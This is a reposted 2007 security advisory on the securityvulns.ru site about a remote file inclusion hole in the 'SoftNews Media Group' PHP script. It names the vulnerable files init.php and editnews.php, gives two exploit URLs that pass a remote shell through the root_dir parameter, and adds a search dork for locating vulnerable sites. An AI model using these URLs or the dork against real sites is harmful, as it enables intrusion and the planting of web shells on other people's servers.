Computer Security

Security Advisory: Remote File Include In Script SoftNews Media Group
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  GaziYapBoz Game Portal Remote SQL Injection Vulnerability

  PostGuestbook 0.6.
1(tpl_pgb_moddir)
Remote File Include Expliot

  netForo 0.
1g(file_to_downlo
ad)Remote File Disclosure Exploit

  Security Advisory - Multiple Vulnerabilities in Grayscale Blog 0.8.0

From:RaeD Hasadya <raed_(at)_bsdmail.com>
Date:10.03.2007
Subject:Remote File Include In Script SoftNews Media Group

By Hasadya Raed
Contact : RaeD@BsdMail.Com
------------------------------------
Script : SoftNews Media Group
Dork : "Copyright © 2004,2006 SoftNews Media Group"
Greetz : Only To Security Focus
------------------------------------
B.Files :
init.php
editnews.php
------------------------------------
Exploits:
http://www.Victim.com/engine/init.php?root_dir=[Shell-Attack]
http://www.Victim.com/engine/Ajax/editnews.php?root_dir=[Shell-Attack]
------------------------------------
By Hasadya Raed



--
_______________________________________________
Get your free email from http://bsdmail.com
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Πειςθνγ@Mail.ru